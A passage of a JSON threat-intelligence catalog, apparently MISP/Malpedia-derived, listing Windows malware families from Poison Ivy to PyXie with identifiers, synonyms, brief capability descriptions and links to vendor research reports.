"https://researchcenter.paloaltonetworks.com/2014/09/recent-watering-hole-attacks-attributed-apt-group-th3bug-using-poison-ivy/", "https://www.welivesecurity.com/2021/02/01/operation-nightscout-supply-chain-attack-online-gaming-asia/", "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2011/the_nitro_attacks.pdf", "https://vblocalhost.com/uploads/VB2020-Ozawa-etal.pdf", "https://us-cert.cisa.gov/ncas/alerts/aa20-275a", "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf", "https://www.secureworks.com/research/threat-profiles/bronze-union", "https://www.fireeye.com/blog/threat-research/2013/08/operation-molerats-middle-east-cyber-attacks-using-poison-ivy.html", "https://www.secureworks.com/research/threat-profiles/bronze-firestone", "https://www.secureworks.com/research/threat-profiles/bronze-riverside", "http://blogs.360.cn/post/APT_C_01_en.html" ], "synonyms": [ "SPIVY", "pivy", "poisonivy" ], "type": [] }, "uuid": "7789fc1b-3cbc-4a1c-8ef0-8b06760f93e7", "value": "Poison Ivy" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.poison_rat", "https://blog.trendmicro.com/trendlabs-security-intelligence/kivars-with-venom-targeted-attacks-upgrade-with-64-bit-support/" ], "synonyms": [], "type": [] }, "uuid": "69605d66-d77e-4e7b-8c64-381e2cd97c14", "value": "Poison RAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.poldat", "http://fireeyeday.com/1604/pdf/KeyNote_2.pdf", "https://youtu.be/DDA2uSxjVWY?t=344", "https://www.cylance.com/content/dam/cylance/pdfs/reports/Op_Dust_Storm_Report.pdf" ], "synonyms": [ "KABOB", "Zlib" ], "type": [] }, "uuid": "d30d5a0c-cbfb-49c3-99e7-1d6d1888fc2d", "value": "Poldat" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.polyglotduke", "https://www.carbonblack.com/2020/03/26/the-dukes-of-moscow/", "https://www.welivesecurity.com/2019/10/17/operation-ghost-dukes-never-left/", "https://www.secureworks.com/research/threat-profiles/iron-hemlock", "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf" ], "synonyms": [], "type": [] }, "uuid": "53371de9-291a-4d33-9fd2-058b43dddd5d", "value": "PolyglotDuke" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.polyglot_ransom", "https://securelist.com/blog/research/76182/polyglot-the-fake-ctb-locker/" ], "synonyms": [], "type": [] }, "uuid": "5ee77368-5e09-4016-ae73-82b99e830832", "value": "Polyglot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pony", "http://www.secureworks.com/research/threat-profiles/gold-essex", "https://www.youtube.com/watch?v=EyDiIAt__dI", "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/", "https://www.uperesia.com/analysis-of-a-packed-pony-downloader", "https://www.secureworks.com/research/threat-profiles/gold-evergreen", "https://research.checkpoint.com/2019/select-code_execution-from-using-sqlite/", "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf", "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", "https://int0xcc.svbtle.com/practical-threat-hunting-and-incidence-response-a-case-of-a-pony-malware-infection", "https://www.secureworks.com/research/threat-profiles/gold-galleon", "https://www.mcafee.com/us/resources/reports/rp-quarterly-threats-jun-2017.pdf", "https://www.secureworks.com/research/threat-profiles/gold-essex", "https://github.com/nyx0/Pony" ], "synonyms": [ "Fareit", "Siplog" ], "type": [] }, "uuid": "cd201689-4bf1-4c5b-ac4d-21c4dcc39e7d", "value": "Pony" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.poohmilk", "https://researchcenter.paloaltonetworks.com/2017/10/unit42-freemilk-highly-targeted-spear-phishing-campaign/", "http://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html" ], "synonyms": [], "type": [] }, "uuid": "54327cbd-d30c-4684-9a66-18ae36b28399", "value": "PoohMilk Loader" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.poorweb", "https://securelist.com/apt-trends-report-q2-2018/86487/", "https://fortiguard.com/resources/threat-brief/2019/05/10/fortiguard-threat-intelligence-brief-may-10-2019", "https://asec.ahnlab.com/ko/18796/", "https://blog.reversinglabs.com/blog/poorweb-exploiting-document-formats" ], "synonyms": [], "type": [] }, "uuid": "e166950b-2d0d-41e1-aee6-ccf0895ce9a5", "value": "PoorWeb" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.popcorn_time" ], "synonyms": [], "type": [] }, "uuid": "4ceebc38-f50b-4817-930f-c954d203ff7b", "value": "Popcorn Time" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.portless", "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/20134508/winnti-more-than-just-a-game-130410.pdf" ], "synonyms": [], "type": [] }, "uuid": "b813cb80-28ff-4713-abdc-e9a22d397bb4", "value": "portless" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.poscardstealer", "http://pages.arbornetworks.com/rs/arbor/images/ASERT%20Threat%20Intelligence%20Brief%202014-06%20Uncovering%20PoS%20Malware%20and%20Attack%20Campaigns.pdf" ], "synonyms": [], "type": [] }, "uuid": "5fa166d1-128b-4057-87e3-6676b7d9a7d7", "value": "poscardstealer" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.poshc2", "https://www.secureworks.com/research/threat-profiles/cobalt-trinity", "https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html", "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_0_JPCERT_en.pdf", "https://paper.seebug.org/1301/", "https://github.com/jeFF0Falltrades/IoCs/blob/master/APT/poshc2_apt_33.md", "https://labs.nettitude.com/blog/detecting-poshc2-indicators-of-compromise/", "https://github.com/nettitude/PoshC2_Python/", "https://redcanary.com/blog/getsystem-offsec/", "https://go.recordedfuture.com/hubfs/reports/cta-2021-0107.pdf", "http://www.rewterz.com/rewterz-news/rewterz-threat-alert-iranian-apt-uses-job-scams-to-lure-targets", "https://www.fireeye.com/blog/threat-research/2020/07/scandalous-external-detection-using-network-scan-data-and-automation.html" ], "synonyms": [], "type": [] }, "uuid": "0215eae2-0ab7-4567-8ac6-1be36a7893a6", "value": "PoshC2" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.poslurp", "https://atr-blog.gigamon.com/2019/07/23/abadbabe-8badf00d-discovering-badhatch-and-a-detailed-look-at-fin8s-tooling/", "https://norfolkinfosec.com/fuel-pumps-ii-poslurp-b/", "https://twitter.com/just_windex/status/1162118585805758464" ], "synonyms": [ "PUNCHTRACK" ], "type": [] }, "uuid": "15305d8b-55ff-47b2-b1c7-550a8a36ce36", "value": "PoSlurp" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.poulight_stealer", "https://www.carbonblack.com/blog/tau-threat-discovery-cryptocurrency-clipper-malware-evolves/", "https://twitter.com/MBThreatIntel/status/1240389621638402049?s=20" ], "synonyms": [ "Poullight" ], "type": [] }, "uuid": "e4bcb3e4-17f6-4786-a19b-255c48a07f9a", "value": "Poulight Stealer" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.poweliks", "https://www.zscaler.com/blogs/research/malvertising-targeting-european-transit-users", "https://www.gdatasoftware.com/blog/2014/07/23947-poweliks-the-persistent-malware-without-a-file", "https://thisissecurity.stormshield.com/2014/08/20/poweliks-command-line-confusion/" ], "synonyms": [], "type": [] }, "uuid": "782bee33-9f8d-41df-a608-c014bd6a7de1", "value": "Poweliks" }, { "description": ".NET variant of ps1.powerton.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.powerband", "https://blog.telsy.com/meeting-powerband-the-apt33-net-powerton-variant/" ], "synonyms": [], "type": [] }, "uuid": "ab603f29-9c10-4fb0-9fa3-e123fad11a31", "value": "POWERBAND" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.powercat", "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/", "https://twitter.com/VK_Intel/status/1141540229951709184" ], "synonyms": [], "type": [] }, "uuid": "f19e4583-e14d-41b7-9b7a-2bd7eeffd4b1", "value": "PowerCat" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.powerduke", "https://www.carbonblack.com/2020/03/26/the-dukes-of-moscow/", "https://www.volexity.com/blog/2016/11/09/powerduke-post-election-spear-phishing-campaigns-targeting-think-tanks-and-ngos/" ], "synonyms": [], "type": [] }, "uuid": "c79f5876-e3b9-417a-8eaf-8f1b01a0fecd", "value": "PowerDuke" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.powerkatz", "https://blog.yoroi.company/research/the-arsenal-behind-the-australian-parliament-hack/" ], "synonyms": [], "type": [] }, "uuid": "9e3aaf82-268b-47d1-b953-3799c5e1f475", "value": "powerkatz" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.powerloader", "https://www.malwaretech.com/2013/08/powerloader-injection-something-truly.html" ], "synonyms": [], "type": [] }, "uuid": "de96ba83-27ec-434c-b77f-7a06820b6e78", "value": "PowerLoader" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.powerpool", "https://www.welivesecurity.com/2018/09/05/powerpool-malware-exploits-zero-day-vulnerability/" ], "synonyms": [], "type": [] }, "uuid": "02e5196e-f7ac-490a-9a92-d4865740016b", "value": "PowerPool" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.powershellrunner", "https://www.welivesecurity.com/2019/05/29/turla-powershell-usage/", "https://raw.githubusercontent.com/k-vitali/Malware-Misc-RE/master/2019-04-13-Possible-Turla-PowerShell-Implant.ps1" ], "synonyms": [], "type": [] }, "uuid": "1e2dfce6-1e38-4cff-a78e-b43a442ae8e6", "value": "PowerShellRunner" }, { "description": "A malware of the gozi group, developed on the base of isfb. It uses Office Macros and PowerShell in documents distributed in e-mail messages.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.powersniff", "https://atr-blog.gigamon.com/2019/07/23/abadbabe-8badf00d-discovering-badhatch-and-a-detailed-look-at-fin8s-tooling/", "https://lokalhost.pl/gozi_tree.txt", "https://unit42.paloaltonetworks.com/powersniff-malware-used-in-macro-based-attacks/", "https://content.fireeye.com/m-trends/rpt-m-trends-2017", "https://afyonluoglu.org/PublicWebFiles/Reports-TR/2017%20FireEye%20M-Trends%20Report.pdf" ], "synonyms": [ "PUNCHBUGGY" ], "type": [] }, "uuid": "519d07f5-bea3-4360-8aa5-f9fcdb79cb52", "value": "Powersniff" }, { "description": "QUICKRIDE.POWER is a PowerShell variant of the QUICKRIDE backdoor. Its payloads are often saved to C:\\windows\\temp\\", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.power_ratankba", "https://content.fireeye.com/apt/rpt-apt38", "https://blog.trendmicro.com/trendlabs-security-intelligence/lazarus-campaign-targeting-cryptocurrencies-reveals-remote-controller-tool-evolved-ratankba/", "https://www.proofpoint.com/sites/default/files/pfpt-us-wp-north-korea-bitten-by-bitcoin-bug.pdf", "https://www.riskiq.com/blog/labs/lazarus-group-cryptocurrency/", "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf", "https://www.flashpoint-intel.com/blog/disclosure-chilean-redbanc-intrusion-lazarus-ties/" ], "synonyms": [ "QUICKRIDE.POWER" ], "type": [] }, "uuid": "606f778a-8b99-4880-8da8-b923651d627b", "value": "PowerRatankba" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.prb_backdoor", "https://sec0wn.blogspot.com/2018/05/prb-backdoor-fully-loaded-powershell.html" ], "synonyms": [], "type": [] }, "uuid": "2c9c42bc-8f26-4122-9454-a7eed8cd8886", "value": "prb_backdoor" }, { "description": "Predator is a feature-rich information stealer. It is sold on hacking forums as a bundle which includes: Payload builder and Command and Control web panel. It is able to grab passwords from browsers, replace cryptocurrency wallets, and take photos from the web-camera. It is developed by using a modular approach so that criminals may add more sophisticated tools on top of the it.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.predator", "https://www.fortinet.com/blog/threat-research/predator-the-thief-new-routes-delivery.html", "https://fumik0.com/2019/12/25/lets-play-again-with-predator-the-thief/", "https://www.bleepingcomputer.com/news/security/fake-microsoft-teams-updates-lead-to-cobalt-strike-deployment/", "https://fumik0.com/2018/10/15/predator-the-thief-in-depth-analysis-v2-3-5/", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", "https://securelist.com/a-predatory-tale/89779", "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf", "https://www.secureworks.com/research/threat-profiles/gold-galleon", "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_4_ogawa-niseki_en.pdf", "https://www.cybereason.com/blog/the-hole-in-the-bucket-attackers-abuse-bitbucket-to-deliver-an-arsenal-of-malware" ], "synonyms": [], "type": [] }, "uuid": "54041c03-5714-4247-9226-3c801f59bc07", "value": "Predator The Thief" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.prikormka", "https://www.welivesecurity.com/wp-content/uploads/2016/05/Operation-Groundbait.pdf" ], "synonyms": [], "type": [] }, "uuid": "00764634-4a21-4c5c-8b1f-fb294c9bdd3f", "value": "Prikormka" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.prilex", "https://www.kaspersky.com/blog/chip-n-pin-cloning/21502", "https://blog.trendmicro.com/trendlabs-security-intelligence/dissecting-prilex-cutlet-maker-atm-malware-families/" ], "synonyms": [], "type": [] }, "uuid": "a0899fec-161d-4ba8-9594-8b5620c21705", "value": "Prilex" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.princess_locker", "https://www.bleepingcomputer.com/news/security/introducing-her-royal-highness-the-princess-locker-ransomware/", "https://blog.malwarebytes.com/threat-analysis/2016/11/princess-ransomware/", "https://hshrzd.wordpress.com/2016/11/17/princess-locker-decryptor/" ], "synonyms": [], "type": [] }, "uuid": "0714a7ad-45cb-44ec-92f9-2e839fd8a6b8", "value": "PrincessLocker" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.project_hook", "https://threatpost.com/dexter-project-hook-pos-malware-campaigns-persist/104655/" ], "synonyms": [], "type": [] }, "uuid": "d0c7815d-6039-436f-96ef-0767aabbdb36", "value": "Project Hook POS" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.proteus", "https://www.fortinet.com/blog/threat-research/a-new-all-in-one-botnet-proteus.html" ], "synonyms": [], "type": [] }, "uuid": "6d5724c6-646f-498a-b810-a6cee20f2b3c", "value": "proteus" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.protonbot", "https://fumik0.com/2019/05/24/overview-of-proton-bot-another-loader-in-the-wild/" ], "synonyms": [], "type": [] }, "uuid": "03f30d04-4568-4c4c-88d6-b62efc72f33a", "value": "ProtonBot" }, { "description": "According to Matthew Mesa, this is a modular bot. The name stems from the string PsiXMainModule in binaries until mid of September 2018.\r\n\r\nIn binaries, apart from BotModule and MainModule, references to the following Modules have be observed:\r\nBrowserModule\r\nBTCModule\r\nComplexModule\r\nKeyLoggerModule\r\nOutlookModule\r\nProcessModule\r\nRansomwareModule\r\nSkypeModule", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.psix", "https://www.proofpoint.com/us/threat-insight/post/psixbot-now-using-google-dns-over-https-and-possible-new-sexploitation-module", "https://blog.fox-it.com/2019/03/27/psixbot-the-evolution-of-a-modular-net-bot/", "https://twitter.com/seckle_ch/status/1169558035649433600", "https://www.proofpoint.com/us/threat-insight/post/psixbot-continues-evolve-updated-dns-infrastructure", "https://twitter.com/mesa_matt/status/1035211747957923840" ], "synonyms": [], "type": [] }, "uuid": "416ae41e-17b2-46f6-847b-2831a0b3f8e9", "value": "PsiX" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pslogger", "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-239a", "https://norfolkinfosec.com/a-lazarus-keylogger-pslogger/" ], "synonyms": [ "ECCENTRICBANDWAGON" ], "type": [] }, "uuid": "1b1d3548-08db-4dff-878f-77d2f0b69777", "value": "PSLogger" }, { "description": "Citizenlab notes that PC Surveillance System (PSS) is a commercial spyware product offered by Cyberbit and marketed to intelligence and law enforcement agencies.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pss", "https://citizenlab.ca/2017/12/champing-cyberbit-ethiopian-dissidents-targeted-commercial-spyware/" ], "synonyms": [ "PSS" ], "type": [] }, "uuid": "e437f01c-8040-4098-a3fa-20154b58c928", "value": "PC Surveillance System" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pteranodon", "https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/", "https://www.elastic.co/blog/playing-defense-against-gamaredon-group", "https://blog.yoroi.company/research/cyberwarfare-a-deep-dive-into-the-latest-gamaredon-espionage-campaign/", "https://labs.sentinelone.com/pro-russian-cyberspy-gamaredon-intensifies-ukrainian-security-targeting/", "https://blog.threatstop.com/russian-apt-gamaredon-group", "https://cert.gov.ua/news/42", "https://www.vkremez.com/2019/01/lets-learn-deeper-dive-into-gamaredon.html", "https://threatrecon.nshc.net/2019/06/11/sectorc08-multi-layered-sfx-recent-campaigns-target-ukraine/", "https://cert.gov.ua/news/46" ], "synonyms": [], "type": [] }, "uuid": "d5138738-846e-4466-830c-cd2bb6ad09cf", "value": "Pteranodon" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pubnubrat", "http://blog.alyac.co.kr/1853", "https://blog.talosintelligence.com/2018/04/fake-av-investigation-unearths-kevdroid.html" ], "synonyms": [], "type": [] }, "uuid": "bcc8e3ef-fc5e-4d44-9011-4d429bac0f26", "value": "PubNubRAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.punkey_pos", "https://www.trustwave.com/Resources/SpiderLabs-Blog/New-POS-Malware-Emerges---Punkey/", "https://www.pandasecurity.com/mediacenter/malware/punkeypos/" ], "synonyms": [ "pospunk", "punkeypos" ], "type": [] }, "uuid": "57a6dbce-2d8a-44ae-a561-282d02935698", "value": "Punkey POS" }, { "description": "Pupy is an open-source, cross-platform RAT and post-exploitation framework mainly written in python. Pupy can be loaded from various loaders, including PE EXE, reflective DLL, Linux ELF, pure python, powershell and APK. Most of the loaders bundle an embedded python runtime, python library modules in source/compiled/native forms as well as a flexible configuration. They bootstrap a python runtime environment mostly in-memory for the later stages of pupy to run in. Pupy can communicate using various transports, migrate into processes, load remote python code, python packages and python C-extensions from memory.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pupy", "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/elfin-apt33-espionage", "https://blog.cyber4sight.com/2017/02/malicious-powershell-script-analysis-indicates-shamoon-actors-used-pupy-rat/", "https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html", "https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage", "https://github.com/n1nj4sec/pupy", "https://www.secureworks.com/blog/iranian-pupyrat-bites-middle-eastern-organizations", "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf", "https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/", "https://go.recordedfuture.com/hubfs/reports/cta-2020-0123.pdf" ], "synonyms": [ "Patpoopy" ], "type": [] }, "uuid": "8a789016-5f8d-4cd9-ba96-ba253db42fd8", "value": "pupy (Windows)" }, { "description": "ransomware", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.purelocker", "https://github.com/albertzsigovits/malware-notes/blob/master/PureLocker.md", "https://exchange.xforce.ibmcloud.com/collection/99c7156cff70e1d8e1687ab7dadc8c0e", "https://www.intezer.com/blog-purelocker-ransomware-being-used-in-targeted-attacks-against-servers/" ], "synonyms": [], "type": [] }, "uuid": "7a0f3f15-6920-4bc0-baa1-17dd8263948e", "value": "PureLocker" }, { "description": "Purple Fox uses msi.dll function, 'MsiInstallProductA', to download and execute its payload. The payload is a .msi file that contains encrypted shellcode including 32-bit and 64-bit versions. once executed the system will be restarted and uses the 'PendingFileRenameOperations' registry to rename it's components. \r\n\r\nUpon restart the rootkit capability of Purple Fox is invoked. It creates a suspended svchost process and injects a DLL that will create a driver with the rootkit capability. \r\n\r\nThe latest version of Purple Fox abuses open-source code to enable it's rootkit components, which includes hiding and protecting its files and registry entries. It also abuses a file utility software to hide its DLL component, which deters reverse engineering.\r\n\r\n", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.purplefox", "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/security-101-the-impact-of-cryptocurrency-mining-malware", "https://blog.trendmicro.com/trendlabs-security-intelligence/purple-fox-fileless-malware-with-rookit-component-delivered-by-rig-exploit-kit-now-abuses-powershell/" ], "synonyms": [], "type": [] }, "uuid": "31638e2b-1c6b-47b9-bbb9-7316f206b354", "value": "win.purplefox" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.purplewave", "https://www.zscaler.com/blogs/research/purplewave-new-infostealer-russia" ], "synonyms": [], "type": [] }, "uuid": "0b63109b-0b4d-4f5d-a475-c91af4eed857", "value": "PurpleWave" }, { "description": "Pushdo is usually classified as a \"downloader\" trojan - meaning its true purpose is to download and install additional malicious software. There are dozens of downloader trojan families out there, but Pushdo is actually more sophisticated than most, but that sophistication lies in the Pushdo control server rather than the trojan.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pushdo", "http://www.secureworks.com/research/threat-profiles/gold-essex", "https://www.blueliv.com/research/tracking-the-footproints-of-pushdo-trojan/", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", "https://www.shadowserver.org/news/has-the-sun-set-on-the-necurs-botnet/", "https://www.secureworks.com/research/threat-profiles/gold-essex", "https://www.trendmicro.de/cloud-content/us/pdfs/business/white-papers/wp_study-of-pushdo-cutwail-botnet.pdf", "http://malware-traffic-analysis.net/2017/04/03/index2.html", "https://www.secureworks.com/research/pushdo" ], "synonyms": [], "type": [] }, "uuid": "b39ffc73-db5f-4a8a-acd2-bee958d69155", "value": "Pushdo" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.putabmow" ], "synonyms": [], "type": [] }, "uuid": "b0cb81bc-5d97-454a-8eee-4e81328c7228", "value": "Putabmow" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pvzout", "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf" ], "synonyms": [], "type": [] }, "uuid": "52932caa-2fac-4eeb-88de-b3e143db010e", "value": "PvzOut" }, { "description": "PwndLocker is a ransomware that was observed in late 2019 and is reported to have been used to target businesses and local governments/cities. According to one source, ransom amounts demanded as part of PwndLocker activity range from $175k USD to $650k USD depending on the size of the network. PwndLocker attempts to disable a variety of Windows services so that their data can be encrypted. Various processes will also be targeted, such as web browsers and software related to security, backups, and databases. Shadow copies are cleared by the ransomware, and encryption of files occurs once the system has been prepared in this way. Executable files and those that are likely to be important for the system to continue to function appear to be skipped by the ransomware, and a large number of folders mostly related to Microsoft Windows system files are also ignored. As of March 2020, encrypted files have been observed with the added extensions of .key and .pwnd. Ransom notes are dropped in folders where encrypted files are found and also on the user's desktop.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pwndlocker", "https://norfolkinfosec.com/tinypos-and-prolocker-an-odd-relationship/", "https://www.cert-pa.it/notizie/pwndlocker-si-rinnova-in-prolock-ransomware/", "https://soolidsnake.github.io/2020/05/11/Prolock_ransomware.html", "https://raw.githubusercontent.com/fboldewin/When-ransomware-hits-an-ATM-giant---The-Diebold-Nixdorf-case-dissected/main/When%20ransomware%20hits%20an%20ATM%20giant%20-%20The%20Diebold%20Nixdorf%20case%20dissected%20-%20Group-IB%20CyberCrimeCon2020.pdf", "https://www.intrinsec.com/egregor-prolock/", "https://www.zdnet.com/article/fbi-prolock-ransomware-gains-access-to-victim-networks-via-qakbot-infections/", "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", "https://id-ransomware.blogspot.com/2019/10/pwndlocker-ransomware.html", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", "https://medium.com/s2wlab/operation-synctrek-e5013df8d167", "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", "https://www.bleepingcomputer.com/news/security/new-pwndlocker-ransomware-targeting-us-cities-enterprises/", "https://www.hornetsecurity.com/en/threat-research/qakbot-reducing-its-on-disk-artifacts/", "https://www.group-ib.com/blog/prolock_evolution", "https://www.hornetsecurity.com/en/security-information/qakbot-malspam-leading-to-prolock/", "https://www.it-klinika.rs/blog/paznja-novi-opasni-ransomware-pwndlocker-i-u-srbiji", "https://news.sophos.com/en-us/2020/07/27/prolock-ransomware-gives-you-the-first-8-kilobytes-of-decryption-for-free/", "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/", "https://www.group-ib.com/blog/prolock", "https://www.bleepingcomputer.com/news/security/pwndlocker-ransomware-gets-pwned-decryption-now-available/" ], "synonyms": [ "ProLock" ], "type": [] }, "uuid": "fe0cf4ab-f151-4549-8127-f669c319d546", "value": "PwndLocker" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pwnpos", "https://usa.visa.com/dam/VCOM/global/support-legal/documents/new-pos-malware-samples.pdf", "https://twitter.com/physicaldrive0/status/573109512145649664", "https://blog.trendmicro.com/trendlabs-security-intelligence/pwnpos-old-undetected-pos-malware-still-causing-havoc/", "https://www.brimorlabsblog.com/2015/03/and-you-get-pos-malware-nameand-you-get.html" ], "synonyms": [], "type": [] }, "uuid": "c903627c-90f6-44ee-9750-4bb44bdbceab", "value": "pwnpos" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pykspa", "https://blogs.akamai.com/sitr/2019/07/pykspa-v2-dga-updated-to-become-selective.html", "https://www.johannesbader.ch/2015/07/pykspas-inferior-dga-version/", "https://www.johannesbader.ch/2015/03/the-dga-of-pykspa/", "https://www.youtube.com/watch?v=HfSQlC76_s4" ], "synonyms": [], "type": [] }, "uuid": "3f0e7db1-5944-4137-89d1-d36940f596d2", "value": "Pykspa" }, { "description": "PyLocky is a ransomware that tries to pass off as Locky in its ransom note. It is written in Python and packaged with PyInstaller.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pylocky", "https://research.checkpoint.com/2020/graphology-of-an-exploit-playbit/", "https://www.cybermalveillance.gouv.fr/nos-articles/outil-dechiffrement-rancongiciel-ransomware-pylocky-v1-2/", "https://www.bleepingcomputer.com/news/security/pylocky-decryptor-released-by-french-authorities/", "https://blog.talosintelligence.com/2019/01/pylocky-unlocked-cisco-talos-releases.html", "https://www.cyborgsecurity.com/cyborg_labs/python-malware-on-the-rise/", "https://sensorstechforum.com/lockymap-files-virus-pylocky-ransomware-remove-restore-data/", "https://www.cert.ssi.gouv.fr/alerte/CERTFR-2018-ALE-008/", "https://blog.trendmicro.com/trendlabs-security-intelligence/a-closer-look-at-the-locky-poser-pylocky-ransomware/" ], "synonyms": [ "Locky Locker" ], "type": [] }, "uuid": "3a5775d3-7d4a-4795-b1b1-7a340030d490", "value": "PyLocky" }, { "description": "Full-featured Python RAT compiled into an executable.\r\n\r\nPyXie RAT functionality includes:\r\n* Man-in-the-middle (MITM) Interception\r\n* Web-injects\r\n* Keylogging\r\n* Credential harvesting\r\n* Network Scanning\r\n* Cookie theft\r\n* Clearing logs\r\n* Recording video\r\n* Running arbitrary payloads\r\n* Monitoring USB drives and exfiltrating data\r\n* WebDav server\r\n* Socks5 proxy\r\n* Virtual Network Connection (VNC)\r\n* Certificate theft\r\n* Inventorying software\r\n* Enumerating the domain with Sharphound", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pyxie", "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/4", "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/3", "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/2/", 